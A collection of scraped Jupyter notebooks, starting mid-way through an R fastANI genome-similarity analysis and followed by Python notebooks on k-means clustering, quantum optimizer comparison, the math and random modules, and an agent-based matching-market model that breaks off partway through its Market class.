train_outF = file.path(work_dir, 'train_genomes_ANI.tsv')
cmd = glue::glue(cmd, params=params, threads=threads, query_genomes=F, ref_genomes=F, output=train_outF)
cmd
# running job
bash_job(cmd, conda_env)
```
# Test
```
# writing out genome fasta file list
F = file.path(work_dir, 'test_genomes.txt')
metadata_f_test %>%
dplyr::select(Fasta) %>%
write.table(F, sep='\t', quote=FALSE, row.names=FALSE, col.names=FALSE)
cat('File written:', F, '\n')
cmd = 'fastANI {params} --threads {threads} --ql {query_genomes} --rl {ref_genomes} -o {output}'
params = '--fragLen 1000 --minFrag 50 -k 16'
test_outF = file.path(work_dir, 'test_genomes_ANI.tsv')
cmd = glue::glue(cmd, params=params, threads=threads, query_genomes=F, ref_genomes=F, output=test_outF)
cmd
# running job
bash_job(cmd, conda_env)
```
# Loading dist mtx
```
train_dist = fread(train_outF, sep='\t', header=FALSE) %>%
mutate(V1 = basename(V1),
V2 = basename(V2),
data_type = 'Train')
train_dist %>% dim %>% print
train_dist %>% head(n=3)
test_dist = fread(test_outF, sep='\t', header=FALSE) %>%
mutate(V1 = basename(V1),
V2 = basename(V2),
data_type = 'Test')
test_dist %>% dim %>% print
test_dist %>% head(n=3)
```
## Creating plots
```
p = train_dist %>%
rbind(test_dist) %>%
filter(V1 != V2) %>%
mutate(data_type = factor(data_type, levels=c('Train', 'Test'))) %>%
ggplot(aes(V3)) +
geom_histogram(bins=50) +
scale_y_log10() +
labs(x='ANI', y='Count') +
facet_grid(. ~ data_type) +
theme_bw()
options(repr.plot.width=6, repr.plot.height=2.5)
plot(p)
F = file.path(work_dir, 'ANI_histograms.pdf')
ggsave(p, file=F, width=6, height=2.5)
cat('File written:', F, '\n')
```
## Summary of 'close' genomes
### Train
```
df_s = train_dist %>%
filter(V1 != V2) %>%
filter(V3 > 99)
train_close_tax = c(df_s$V1, df_s$V2) %>% unique
train_close_tax %>% print
df_s$V3 %>% summary
metadata_f_train %>%
mutate(Fasta = basename(as.character(Fasta))) %>%
filter(Fasta %in% train_close_tax) %>%
dplyr::select(Taxon, ncbi_taxonomy, gtdb_taxonomy, Fasta, data_partition) %>%
arrange(ncbi_taxonomy)
# Test: summary of "close" genomes
df_s = test_dist %>%
filter(V1 != V2) %>%
filter(V3 > 99)
test_close_tax = c(df_s$V1, df_s$V2) %>% unique
test_close_tax %>% print
df_s$V3 %>% summary
metadata_f_test %>%
mutate(Fasta = basename(as.character(Fasta))) %>%
filter(Fasta %in% test_close_tax) %>%
dplyr::select(Taxon, ncbi_taxonomy, gtdb_taxonomy, Fasta, data_partition) %>%
arrange(ncbi_taxonomy)
```
# fastANI on all genomes
* including train-test ANI
```
# joining
metadata = rbind(metadata_f_train, metadata_f_test)
metadata %>% head(n=3)
# writing out genome fasta file list
F = file.path(work_dir, 'train-test_genomes.txt')
metadata %>%
dplyr::select(Fasta) %>%
write.table(F, sep='\t', quote=FALSE, row.names=FALSE, col.names=FALSE)
cat('File written:', F, '\n')
# creating CMD
cmd = 'fastANI {params} --threads {threads} --ql {query_genomes} --rl {ref_genomes} -o {output}'
params = '--fragLen 1000 --minFrag 50 -k 16'
outF = file.path(work_dir, 'train-test_genomes_ANI.tsv')
cmd = glue::glue(cmd, params=params, threads=threads, query_genomes=F, ref_genomes=F, output=outF)
cmd
# running job
bash_job(cmd, conda_env)
# resources = list(h_rt = '24:00:00',
# h_vmem = '7G',
# threads = '16',
# conda.env = 'py3_physeq') # conda env with batchtools installed
# plan(batchtools_sge, resources=resources, workers=50)
# # apply function (packages set with `future.packages`)
# job_ret = future_lapply(as.list(cmd), FUN = function(x) bash_job(x, conda_env=conda_env))
# job_ret
```
## Summary
```
# loading distance matrix for train dataset
dist = fread(outF, sep='\t', header=FALSE) %>%
mutate(V1 = basename(V1),
V2 = basename(V2))
colnames(dist) = c('Genome.x', 'Genome.y', 'ANI', 'X', 'Y')
dist %>% dim %>% print
dist %>% head(n=3)
```
### Adding partition labels
* which genomes came from which partition?
```
tmp = metadata %>%
distinct(Taxon, accession, Fasta, data_partition) %>%
mutate(Fasta = basename(as.character(Fasta)))
dist = dist %>%
inner_join(tmp, c('Genome.x'='Fasta')) %>%
inner_join(tmp, c('Genome.y'='Fasta'))
dist %>% nrow
dist %>% head
```
### Plotting
```
dist %>%
group_by(data_partition.y, data_partition.x) %>%
summarize(n = n()) %>%
ungroup()
p = dist %>%
filter(Genome.x != Genome.y,
!(data_partition.x == 'Test' &
data_partition.y == 'Train')) %>%
ggplot(aes(ANI)) +
geom_histogram(bins=50) +
scale_y_log10() +
labs(x='ANI', y='Count') +
facet_grid(data_partition.y ~ data_partition.x) +
theme_bw()
options(repr.plot.width=5, repr.plot.height=3)
plot(p)
# writing plot
F = file.path(work_dir, 'ANI_histograms_train-test.pdf')
ggsave(p, file=F, width=5, height=3)
cat('File written:', F, '\n')
# clearning memory
dist = NULL
```
# sessionInfo
```
sessionInfo()
```
| github_jupyter |
```
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns; sns.set()
%matplotlib inline
# Data generating
np.random.seed(37)
X = np.vstack(((np.random.randn(150, 2) + np.array([3, 0])),
(np.random.randn(100, 2) + np.array([-3.5, 0.5])),
(np.random.randn(100, 2) + np.array([-0.5, -2])),
(np.random.randn(150, 2) + np.array([-2, -2.5])),
(np.random.randn(150, 2) + np.array([-5.5, -3]))))
print('First five examples: ', X[:5])
print('X.shape:', X.shape)
plt.scatter(X[:, 0], X[:, 1], s=30)
plt.xlabel('Satisfaction')
plt.ylabel('Loyalty')
ax = plt.gca()
# KMeans
class KMeans_own(object):
"""
Parameters:
-----------
X -- np.array
Matrix of input features
k -- int
Number of clusters
"""
def __init__(self, X, k):
self.X = X
self.k = k
def initialize_centroids(self):
"""
Returns:
Array of shape (k, n_features),
containing k centroids from the initial points
"""
# use shuffle with random state = 100, and pick first k points
np.random.seed(100)
k = self.k
X_for_shuffle = self.X.copy()
np.random.shuffle(X_for_shuffle)
return X_for_shuffle[:k]
def closest_centroid(self, centroids):
"""
Returns:
Array of shape (n_examples, ),
containing index of the nearest centroid for each point
"""
n_examples = self.X.shape[0]
n_features = centroids.shape[1]
k = centroids.shape[0]
closest_centrs = np.full(n_examples, -1)
for i in range(n_examples):
min_distance = np.inf
for j in range(k):
row_norm = np.linalg.norm(self.X[i, :] - centroids[j, :])
current_distance = np.square(row_norm)
if current_distance < min_distance:
min_distance = current_distance
closest_centrs[i] = j
return closest_centrs
def move_centroids(self, centroids):
"""
Returns:
Array of shape (n_clusters, n_features),
containing the new centroids assigned from the points closest to them
"""
n_clusters = centroids.shape[0]
n_features = centroids.shape[1]
closest_centrs = self.closest_centroid(centroids)
new_centers = np.zeros((n_clusters, n_features))
for j in range(n_clusters):
inds = np.where(closest_centrs == j)[0]
X_subset = self.X[inds]
new_centers[j] = np.mean(X_subset, axis=0)
return new_centers
def final_centroids(self):
"""
Returns:
clusters -- list of arrays, containing points of each cluster
centroids -- array of shape (n_clusters, n_features),
containing final centroids
"""
centroids = self.initialize_centroids()
closest_centrs = self.closest_centroid(centroids)
new_centers = self.move_centroids(centroids)
old_centers = new_centers - 0.5
while not np.array_equal(new_centers, old_centers):
old_centers = new_centers
closest_centrs = self.closest_centroid(new_centers)
new_centers = self.move_centroids(new_centers)
centroids = new_centers
n_clusters = centroids.shape[0]
clusters = []
for j in range(n_clusters):
inds = np.where(closest_centrs == j)[0]
X_subset = self.X[inds]
clusters.append(X_subset)
return clusters, centroids
model = KMeans_own(X, 3)
centroids = model.initialize_centroids()
print('Random centroids:', centroids)
plt.scatter(X[:, 0], X[:, 1], s=30)
plt.scatter(centroids[:,0], centroids[:,1], s=600, marker='*', c='r')
plt.xlabel('Satisfaction')
plt.ylabel('Loyalty')
ax = plt.gca()
closest = model.closest_centroid(centroids)
print('Closest centroids:', closest[:10])
plt.scatter(X[:, 0], X[:, 1], s=30, c=closest, cmap='rainbow')
plt.scatter(centroids[:,0], centroids[:,1], s=600, marker='*', c='b')
plt.xlabel('Satisfaction')
plt.ylabel('Loyalty')
ax = plt.gca()
next_centroids = model.move_centroids(centroids)
print('Next centroids:', next_centroids)
clusters, final_centrs = model.final_centroids()
print('Final centroids:', final_centrs)
print('Clusters points:', clusters[0][0], clusters[1][0], clusters[2][0])
# mean distances
def mean_distances(k, X):
"""
Arguments:
k -- int, number of clusters
X -- np.array, matrix of input features
Returns:
Array of shape (k, ), containing mean of sum distances
from centroid to each point in the cluster for k clusters
"""
sum_distances = np.zeros(k)
for g in range(1, k+1):
model = KMeans_own(X, g)
clusters, final_centrs = model.final_centroids()
cluster_distance = np.zeros(g)
for j in range(g):
n_examples = clusters[j].shape[0]
current_distance = np.zeros(n_examples)
for i in range(n_examples):
row_norm = np.linalg.norm(clusters[j][i] - final_centrs[j])
current_distance[i] = np.square(row_norm)
cluster_distance[j] = np.sum(current_distance)
sum_distances[g-1] = np.sum(cluster_distance) / g
return sum_distances
print('Mean distances: ', mean_distances(10, X))
k_clusters = range(1, 11)
distances = mean_distances(10, X)
plt.plot(k_clusters, distances)
plt.xlabel('k')
plt.ylabel('Mean distance')
plt.title('The Elbow Method showing the optimal k')
plt.show()
# Solving the problem using sklearn
from sklearn.cluster import KMeans
from sklearn import preprocessing
data = preprocessing.scale(X)
plt.scatter(data[:, 0], data[:, 1], s=30)
plt.xlabel('Satisfaction')
plt.ylabel('Loyalty')
ax = plt.gca()
kmeans = KMeans(3)
kmeans.fit(data)
plt.scatter(data[:, 0], data[:, 1], c=kmeans.predict(data), cmap='rainbow')
plt.xlabel('Satisfaction')
plt.ylabel('Loyalty')
ax = plt.gca()
kmeans.inertia_
kmeans.cluster_centers_
kmeans = KMeans(4)
kmeans.fit(data)
plt.scatter(data[:, 0], data[:, 1], c=kmeans.predict(data), cmap='rainbow')
plt.xlabel('Satisfaction')
plt.ylabel('Loyalty')
ax = plt.gca()
# Another example
import pandas as pd
dataset = pd.read_csv('Mall_Customers.csv')
dataset.head()
X = dataset.iloc[:, [3, 4]].values
X
wcss = []
for i in range(1, 11):
kmeans = KMeans(n_clusters = i, init = 'k-means++', random_state = 42)
kmeans.fit(X)
wcss.append(kmeans.inertia_)
plt.plot(range(1, 11), wcss)
plt.title('The Elbow Method')
plt.xlabel('Number of clusters')
plt.ylabel('WCSS')
plt.show()
kmeans = KMeans(n_clusters = 5, init = 'k-means++', random_state = 42)
y_kmeans = kmeans.fit_predict(X)
y_kmeans
X[y_kmeans == 0, 0]
X[y_kmeans == 0, 1]
plt.scatter(X[y_kmeans == 0, 0], X[y_kmeans == 0, 1], s = 100, c = 'red', label = 'Cluster 1')
plt.scatter(X[y_kmeans == 1, 0], X[y_kmeans == 1, 1], s = 100, c = 'blue', label = 'Cluster 2')
plt.scatter(X[y_kmeans == 2, 0], X[y_kmeans == 2, 1], s = 100, c = 'green', label = 'Cluster 3')
plt.scatter(X[y_kmeans == 3, 0], X[y_kmeans == 3, 1], s = 100, c = 'cyan', label = 'Cluster 4')
plt.scatter(X[y_kmeans == 4, 0], X[y_kmeans == 4, 1], s = 100, c = 'magenta', label = 'Cluster 5')
plt.scatter(kmeans.cluster_centers_[:, 0], kmeans.cluster_centers_[:, 1], s = 300, c = 'yellow', label = 'Centroids')
plt.title('Clusters of customers')
plt.xlabel('Annual Income (k$)')
plt.ylabel('Spending Score (1-100)')
plt.legend()
plt.show()
cluster1 = np.array([X[y_kmeans == 0, 0], X[y_kmeans == 0, 1]]).T
cluster2 = np.array([X[y_kmeans == 1, 0], X[y_kmeans == 1, 1]]).T
cluster3 = np.array([X[y_kmeans == 2, 0], X[y_kmeans == 2, 1]]).T
cluster4 = np.array([X[y_kmeans == 3, 0], X[y_kmeans == 3, 1]]).T
cluster5 = np.array([X[y_kmeans == 4, 0], X[y_kmeans == 4, 1]]).T
plt.scatter(cluster1[:,0], cluster1[:,1], s = 100, c = 'red', label = 'Cluster 1')
plt.scatter(cluster2[:,0], cluster2[:,1], s = 100, c = 'blue', label = 'Cluster 2')
plt.scatter(cluster3[:,0], cluster3[:,1], s = 100, c = 'green', label = 'Cluster 3')
plt.scatter(cluster4[:,0], cluster4[:,1], s = 100, c = 'cyan', label = 'Cluster 4')
plt.scatter(cluster5[:,0], cluster5[:,1], s = 100, c = 'magenta', label = 'Cluster 5')
plt.scatter(kmeans.cluster_centers_[:, 0], kmeans.cluster_centers_[:, 1], s = 300, c = 'yellow', label = 'Centroids')
plt.title('Clusters of customers')
plt.xlabel('Annual Income (k$)')
plt.ylabel('Spending Score (1-100)')
plt.legend()
plt.show()
# Hierarchical clustering
import scipy.cluster.hierarchy as sch
dendrogram = sch.dendrogram(sch.linkage(X, method = 'ward'))
plt.title('Dendrogram')
plt.xlabel('Customers')
plt.ylabel('Euclidean distances')
plt.show()
from sklearn.cluster import AgglomerativeClustering
hc = AgglomerativeClustering(n_clusters = 5, affinity = 'euclidean', linkage = 'ward')
y_hc = hc.fit_predict(X)
y_hc
plt.scatter(X[y_hc == 0, 0], X[y_hc == 0, 1], s = 100, c = 'red', label = 'Cluster 1')
plt.scatter(X[y_hc == 1, 0], X[y_hc == 1, 1], s = 100, c = 'blue', label = 'Cluster 2')
plt.scatter(X[y_hc == 2, 0], X[y_hc == 2, 1], s = 100, c = 'green', label = 'Cluster 3')
plt.scatter(X[y_hc == 3, 0], X[y_hc == 3, 1], s = 100, c = 'cyan', label = 'Cluster 4')
plt.scatter(X[y_hc == 4, 0], X[y_hc == 4, 1], s = 100, c = 'magenta', label = 'Cluster 5')
plt.title('Clusters of customers')
plt.xlabel('Annual Income (k$)')
plt.ylabel('Spending Score (1-100)')
plt.legend()
plt.show()
# Different algorithms and metrics analysis for MNIST dataset
from sklearn import metrics
from sklearn import datasets
from sklearn.cluster import KMeans, AgglomerativeClustering, AffinityPropagation, SpectralClustering
data = datasets.load_digits()
X, y = data.data, data.target
algorithms = []
algorithms.append(KMeans(n_clusters=10, random_state=1))
algorithms.append(AffinityPropagation())
algorithms.append(SpectralClustering(n_clusters=10, random_state=1,
affinity='nearest_neighbors'))
algorithms.append(AgglomerativeClustering(n_clusters=10))
data = []
for algo in algorithms:
algo.fit(X)
data.append(({
'ARI': metrics.adjusted_rand_score(y, algo.labels_),
'AMI': metrics.adjusted_mutual_info_score(y, algo.labels_),
'Homogenity': metrics.homogeneity_score(y, algo.labels_),
'Completeness': metrics.completeness_score(y, algo.labels_),
'V-measure': metrics.v_measure_score(y, algo.labels_),
'Silhouette': metrics.silhouette_score(X, algo.labels_)}))
results = pd.DataFrame(data=data, columns=['ARI', 'AMI', 'Homogenity',
'Completeness', 'V-measure',
'Silhouette'],
index=['K-means', 'Affinity',
'Spectral', 'Agglomerative'])
results
algo = AgglomerativeClustering(n_clusters=10)
algo.fit(X)
algo.labels_
metrics.adjusted_rand_score(y, algo.labels_)
```
| github_jupyter |
# Test: Optimizers performance
In this notebook we are testing how different optimizers such as SPSA, ADAM or COBYLA behave when doing state discrimination.
```
import sys
sys.path.append('../../')
import itertools
import numpy as np
import matplotlib.pyplot as plt
from numpy import pi
from qiskit.algorithms.optimizers import SPSA, COBYLA, ADAM
from qnn.quantum_neural_networks import StateDiscriminativeQuantumNeuralNetworks as nnd
from qnn.quantum_state import QuantumState
plt.style.use('ggplot')
#Number of random states tested
N = 10
# Create random states
random_states = []
for i in range(N):
ψ = QuantumState.random(1)
ϕ = QuantumState.random(1)
random_states.append([ψ, ϕ])
# Parameters
th_u, fi_u, lam_u = [0], [0], [0]
th1, th2 = [0], [pi]
th_v1, th_v2 = [0], [0]
fi_v1, fi_v2 = [0], [0]
lam_v1, lam_v2 = [0], [0]
params = list(itertools.chain(th_u, fi_u, lam_u, th1, th2, th_v1, th_v2, fi_v1, fi_v2, lam_v1, lam_v2))
# Initialize Discriminator
discriminator_list = []
for i in range(N):
discriminator = nnd(random_states[i])
discriminator_list.append(discriminator)
# Optimal solution
optimal_list = []
for i in range(N):
optimal_list.append(nnd.helstrom_bound(random_states[i][0], random_states[i][1]))
# Calculate cost function using SPSA
# We use 75 iterations for SPSA, so he does 201 function evaluations: 50 for calibration,
# 2 each iteration and the final evaluation.
spsa_results = []
for i in range(N):
results = discriminator_list[i].discriminate(SPSA(75), params)
spsa_results.append(results[1])
# Calculate cost function using ADAM
# Adam evaluates 12 times each iteration plus the final one so we will use 17 iterations
# to get a total of 205 evaluations.
adam_results = []
for i in range(N):
results = discriminator_list[i].discriminate(ADAM(17), params)
adam_results.append(results[1])
# Calculate cost function using COBLYA
# COBYLA does an evaluation each iteration
cobyla_results = []
for i in range(N):
results = discriminator_list[i].discriminate(COBYLA(200), params)
cobyla_results.append(results[1])
# Lets calculate the mean squared error of the results
def mean_squared_error(results, optimal_list, n):
sol = 0
for i in range(n):
sol += (1 / n) * (results[i] - optimal_list[i]) ** 2
return sol
# SPSA mean_squared_error
spsa_error = mean_squared_error(spsa_results, optimal_list, N)
# ADAM mean_squared_error
adam_error = mean_squared_error(adam_results, optimal_list, N)
# COBYLA mean_squared_error
cobyla_error = mean_squared_error(cobyla_results, optimal_list, N)
x = ["SPSA", "ADAM", "COBYLA"]
y = [spsa_error, adam_error, cobyla_error]
fig = plt.bar(x, y, log=True, color="red")
plt.xlabel("Optimizers")
plt.ylabel("Mean Squared Error")
plt.title("Comparison of different optimizers performance")
plt.savefig('optimizers_performance.png', dpi=400)
plt.show()
```
| github_jupyter |
# Math and Random Modules
Python comes with a built in math module and random module. In this lecture we will give a brief tour of their capabilities. Usually you can simply look up the function call you are looking for in the online documentation.
* [Math Module](https://docs.python.org/3/library/math.html)
* [Random Module](https://docs.python.org/3/library/random.html)
We won't go through every function available in these modules since there are so many, but we will show some useful ones.
## Useful Math Functions
```
import math
help(math)
```
### Rounding Numbers
```
value = 4.35
math.floor(value)
math.ceil(value)
round(value)
```
### Mathematical Constants
```
math.pi
from math import pi
pi
math.e
math.tau
math.inf
math.nan
```
### Logarithmic Values
```
math.e
# Log Base e
math.log(math.e)
# Will produce an error if value does not exist mathmatically
math.log(0)
math.log(10)
math.e ** 2.302585092994046
```
### Custom Base
```
# math.log(x,base)
math.log(100,10)
10**2
```
### Trigonometrics Functions
```
# Radians
math.sin(10)
math.degrees(pi/2)
math.radians(180)
```
# Random Module
Random Module allows us to create random numbers. We can even set a seed to produce the same random set every time.
The explanation of how a computer attempts to generate random numbers is beyond the scope of this course since it involves higher level mathmatics. But if you are interested in this topic check out:
* https://en.wikipedia.org/wiki/Pseudorandom_number_generator
* https://en.wikipedia.org/wiki/Random_seed
## Understanding a seed
Setting a seed allows us to start from a seeded psuedorandom number generator, which means the same random numbers will show up in a series. Note, you need the seed to be in the same cell if your using jupyter to guarantee the same results each time. Getting a same set of random numbers can be important in situations where you will be trying different variations of functions and want to compare their performance on random values, but want to do it fairly (so you need the same set of random numbers each time).
```
import random
random.randint(0,100)
random.randint(0,100)
# The value 101 is completely arbitrary, you can pass in any number you want
random.seed(101)
# You can run this cell as many times as you want, it will always return the same number
random.randint(0,100)
random.randint(0,100)
# The value 101 is completely arbitrary, you can pass in any number you want
random.seed(101)
print(random.randint(0,100))
print(random.randint(0,100))
print(random.randint(0,100))
print(random.randint(0,100))
print(random.randint(0,100))
```
### Random Integers
```
random.randint(0,100)
```
### Random with Sequences
#### Grab a random item from a list
```
mylist = list(range(0,20))
mylist
random.choice(mylist)
mylist
```
### Sample with Replacement
Take a sample size, allowing picking elements more than once. Imagine a bag of numbered lottery balls, you reach in to grab a random lotto ball, then after marking down the number, **you place it back in the bag**, then continue picking another one.
```
random.choices(population=mylist,k=10)
```
### Sample without Replacement
Once an item has been randomly picked, it can't be picked again. Imagine a bag of numbered lottery balls, you reach in to grab a random lotto ball, then after marking down the number, you **leave it out of the bag**, then continue picking another one.
```
random.sample(population=mylist,k=10)
```
### Shuffle a list
**Note: This effects the object in place!**
```
# Don't assign this to anything!
random.shuffle(mylist)
mylist
```
### Random Distributions
#### [Uniform Distribution](https://en.wikipedia.org/wiki/Uniform_distribution)
```
# Continuous, random picks a value between a and b, each value has equal change of being picked.
random.uniform(a=0,b=100)
```
#### [Normal/Gaussian Distribution](https://en.wikipedia.org/wiki/Normal_distribution)
```
random.gauss(mu=0,sigma=1)
```
Final Note: If you find yourself using these libraries a lot, take a look at the NumPy library for Python, covers all these capabilities with extreme efficiency. We cover this library and a lot more in our data science and machine learning courses.
| github_jupyter |
# Matching Market
This simple model consists of a buyer, a supplier, and a market.
The buyer represents a group of customers whose willingness to pay for a single unit of the good is captured by a vector of prices _wta_. You can initiate the buyer with a set_quantity function which randomly assigns the willingness to pay according to your specifications. You may ask for these willingness to pay quantities with a _getbid_ function.
The supplier is similar, but instead the supplier is willing to be paid to sell a unit of technology. The supplier for instance may have non-zero variable costs that make them unwilling to produce the good unless they receive a specified price. Similarly the supplier has a get_ask function which returns a list of desired prices.
The willingness to pay or sell are set randomly using uniform random distributions. The resultant lists of bids are effectively a demand curve. Likewise the list of asks is effectively a supply curve. A more complex determination of bids and asks is possible, for instance using time of year to vary the quantities being demanded.
## New in version 20
- fixed bug in clearing mechanism, included a logic check to avoid wierd behavior around zero
## Microeconomic Foundations
The market assumes the presence of an auctioneer which will create a _book_, which seeks to match the bids and the asks as much as possible. If the auctioneer is neutral, then it is incentive compatible for the buyer and the supplier to truthfully announce their bids and asks. The auctioneer will find a single price which clears as much of the market as possible. Clearing the market means that as many willing swaps happens as possible. You may ask the market object at what price the market clears with the get_clearing_price function. You may also ask the market how many units were exchanged with the get_units_cleared function.
## Agent-Based Objects
The following section presents three objects which can be used to make an agent-based model of an efficient, two-sided market.
```
%matplotlib inline
import matplotlib.pyplot as plt
import random as rnd
import pandas as pd
import numpy as np
import time
import datetime
import calendar
import json
import statistics
# fix what is missing with the datetime/time/calendar package
def add_months(sourcedate,months):
month = sourcedate.month - 1 + months
year = int(sourcedate.year + month / 12 )
month = month % 12 + 1
day = min(sourcedate.day,calendar.monthrange(year, month)[1])
return datetime.date(year,month,day)
# measure how long it takes to run the script
startit = time.time()
dtstartit = datetime.datetime.now()
```
## classes buyers and sellers
Below we are constructing the buyers and sellers in classes.
```
class Seller():
def __init__(self, name):
self.name = name
self.wta = []
self.step = 0
self.prod = 2000
self.lb_price = 10
self.lb_multiplier = 0
self.ub_price = 20
self.ub_multiplier = 0
self.init_reserve = 500000
self.reserve = 500000
self.init_unproven_reserve = 0
self.unproven_reserve = 0
#multiple market idea, also 'go away from market'
self.subscr_market = {}
self.last_price = 15
self.state_hist = {}
self.cur_scenario = ''
self.count = 0
self.storage = 0
self.q_to_market = 0
self.ratio_sold = 0
self.ratio_sold_hist = []
# the supplier has n quantities that they can sell
# they may be willing to sell this quantity anywhere from a lower price of l
# to a higher price of u
def set_quantity(self):
self.count = 0
self.update_price()
n = self.prod
l = self.lb_price + self.lb_multiplier
u = self.ub_price + self.ub_multiplier
wta = []
for i in range(n):
p = rnd.uniform(l, u)
wta.append(p)
if len(wta) < self.reserve:
self.wta = wta
else:
self.wta = wta[0:(self.reserve-1)]
self.prod = self.reserve
if len(self.wta) > 0:
self.wta = self.wta #sorted(self.wta, reverse=False)
self.q_to_market = len(self.wta)
def get_name(self):
return self.name
def get_asks(self):
return self.wta
def extract(self, cur_extraction):
if self.reserve > 0:
self.reserve = self.reserve - cur_extraction
else:
self.prod = 0
# production costs rise a 100%
def update_price(self):
depletion = (self.init_reserve - self.reserve) / self.init_reserve
self.ub_multiplier = int(self.ub_price * depletion)
self.lb_multiplier = int(self.lb_price * depletion)
def return_not_cleared(self, not_cleared):
self.count = self.count + (len(self.wta) - len(not_cleared))
self.wta = not_cleared
def get_price(self, price):
self.last_price = price
def update_production(self):
if (self.step/12).is_integer():
if self.prod > 0 and self.q_to_market > 0:
rp_ratio = self.reserve / self.prod
self.ratio_sold = self.count / self.q_to_market
self.ratio_sold_hist.append(self.ratio_sold)
yearly_average = statistics.mean(self.ratio_sold_hist[-12:])
if (rp_ratio > 15) and (yearly_average > .9):
self.prod = int(self.prod * 1.1)
if print_details:
print("%s evaluate production" % self.name)
if (self.unproven_reserve > 0) and (self.cur_scenario == 'PACES'):
self.reserve = self.reserve + int(0.1 * self.init_unproven_reserve)
self.unproven_reserve = self.unproven_reserve - int(0.1 * self.init_unproven_reserve)
def evaluate_timestep(self):
self.update_production()
# record every step into an dictionary, nog pythonic look into (vars)
def book_keeping(self):
self.state_hist[self.step] = self.__dict__
class Buyer():
def __init__(self, name):
self.name = name
self.type = 0
self.rof = 0
self.wtp = []
self.step = 0
self.offset= 0
self.base_demand = 0
self.max_demand = 0
self.lb_price = 10
self.ub_price = 20
self.last_price = 15
self.subscr_market = {}
self.state_hist = {}
self.cur_scenario = ''
self.count = 0
self.real_demand = 0
self.storage_cap = 1
self.storage = 0
self.storage_q = 0
# the supplier has n quantities that they can buy
# they may be willing to sell this quantity anywhere from a lower price of l
# to a higher price of u
def set_quantity(self):
self.count = 0
self.update_price()
n = int(self.consumption(self.step))
l = self.lb_price
u = self.ub_price
wtp = []
for i in range(n):
p = rnd.uniform(l, u)
wtp.append(p)
self.wtp = wtp #sorted(wtp, reverse=True)
# gets a little to obvious
def get_name(self):
return self.name
# return list of willingness to pay
def get_bids(self):
return self.wtp
def consumption(self, x):
# make it initialise to seller
b = self.base_demand
m = self.max_demand
y = b + m * (.5 * (1 + np.cos(((x+self.offset)/6)*np.pi)))
self.real_demand = y
s = self.storage_manager()
return(y+s)
def update_price(self):
# adjust Q
if self.type == 1: #home
if (self.step/12).is_integer():
self.base_demand = home_savings[self.cur_scenario] * self.base_demand
self.max_demand = home_savings[self.cur_scenario] * self.max_demand
if self.type == 2: # elec for eu + us
if (self.step/12).is_integer():
cur_elec_df = elec_space['RELATIVE'][self.cur_scenario]
period_now = add_months(period_null, self.step)
index_year = int(period_now.strftime('%Y'))
#change_in_demand = cur_elec_df[index_year]
self.base_demand = self.base_demand * cur_elec_df[index_year]
self.max_demand = self.max_demand * cur_elec_df[index_year]
if self.type == 3: #indu
if (self.step/12).is_integer():
if (self.rof == 0) and (self.cur_scenario == 'PACES'):
#cur_df = economic_growth['ECONOMIC GROWTH'][self.cur_scenario]
period_now = add_months(period_null, self.step)
index_year = int(period_now.strftime('%Y'))
#growth = cur_df[index_year]
growth = np.arctan((index_year-2013)/10)/(.5*np.pi)*.05+0.03
self.base_demand = (1 + growth) * self.base_demand
self.max_demand = (1 + growth) * self.max_demand
else:
cur_df = economic_growth['ECONOMIC GROWTH'][self.cur_scenario]
period_now = add_months(period_null, self.step)
index_year = int(period_now.strftime('%Y'))
growth = cur_df[index_year]
self.base_demand = (1 + growth) * self.base_demand
self.max_demand = (1 + growth) * self.max_demand
## adjust P now to get_price, but adress later
## moved to get_price, rename update_price function (?)
#self.lb_price = self.last_price * .75
#self.ub_price= self.last_price * 1.25
def return_not_cleared(self, not_cleared):
self.count = self.count + (len(self.wtp)-len(not_cleared))
self.wtp = not_cleared
def get_price(self, price):
self.last_price = price
if self.last_price > 100:
self.last_price = 100
self.lb_price = self.last_price * .75
self.ub_price= self.last_price * 1.25
# writes complete state to a dictionary, see if usefull
def book_keeping(self):
self.state_hist[self.step] = self.__dict__
# there has to be some accountability for uncleared bids of the buyers
def evaluate_timestep(self):
if self.type==1:
not_cleared = len(self.wtp)
#total_demand = self.real_demand + self.storage_q
storage_delta = self.storage_q - not_cleared
self.storage = self.storage + storage_delta
if print_details:
print(self.name, storage_delta)
def storage_manager(self):
# check if buyer is household buyer
if self.type==1:
if self.storage < 0:
self.storage_q = -self.storage
else:
self.storage_q = 0
return(self.storage_q)
else:
return(0)
```
## Construct the market
For the market two classes are made. The market itself, which controls the buyers and the sellers, and the book. The market has a book where the results of the clearing procedure are stored.
```
# the book is an object of the market used for the clearing procedure
class Book():
def __init__(self):
self.ledger = pd.DataFrame(columns = ("role","name","price","cleared"))
def set_asks(self,seller_list):
# ask each seller their name
# ask each seller their willingness
# for each willingness append the data frame
for seller in seller_list:
seller_name = seller.get_name()
seller_price = seller.get_asks()
ar_role = np.full((1,len(seller_price)),'seller', dtype=object)
ar_name = np.full((1,len(seller_price)),seller_name, dtype=object)
ar_cleared = np.full((1,len(seller_price)),'in process', dtype=object)
temp_ledger = pd.DataFrame([*ar_role,*ar_name,seller_price,*ar_cleared]).T
temp_ledger.columns= ["role","name","price","cleared"]
self.ledger = self.ledger.append(temp_ledger, ignore_index=True)
def set_bids(self,buyer_list):
# ask each seller their name
# ask each seller their willingness
# for each willingness append the data frame
for buyer in buyer_list:
buyer_name = buyer.get_name()
buyer_price = buyer.get_bids()
ar_role = np.full((1,len(buyer_price)),'buyer', dtype=object)
ar_name = np.full((1,len(buyer_price)),buyer_name, dtype=object)
ar_cleared = np.full((1,len(buyer_price)),'in process', dtype=object)
temp_ledger = pd.DataFrame([*ar_role,*ar_name,buyer_price,*ar_cleared]).T
temp_ledger.columns= ["role","name","price","cleared"]
self.ledger = self.ledger.append(temp_ledger, ignore_index=True)
def update_ledger(self,ledger):
self.ledger = ledger
def get_ledger(self):
return self.ledger
def clean_ledger(self):
self.ledger = pd.DataFrame(columns = ("role","name","price","cleared"))
class Market():
def __init__(self, name):
self.name= name
self.count = 0
self.last_price = ''
self.book = Book()
self.b = []
self.s = []
self.buyer_list = []
self.seller_list = []
self.buyer_dict = {}
self.seller_dict = {}
self.ledger = ''
self.seller_analytics = {}
self.buyer_analytics = {}
def book_keeping_all(self):
for i in self.buyer_dict:
self.buyer_dict[i].book_keeping()
for i in self.seller_dict:
self.seller_dict[i].book_keeping()
def add_buyer(self,buyer):
if buyer.subscr_market[self.name] == 1:
self.buyer_list.append(buyer)
def add_seller(self,seller):
if seller.subscr_market[self.name] == 1:
self.seller_list.append(seller)
def set_book(self):
self.book.set_bids(self.buyer_list)
self.book.set_asks(self.seller_list)
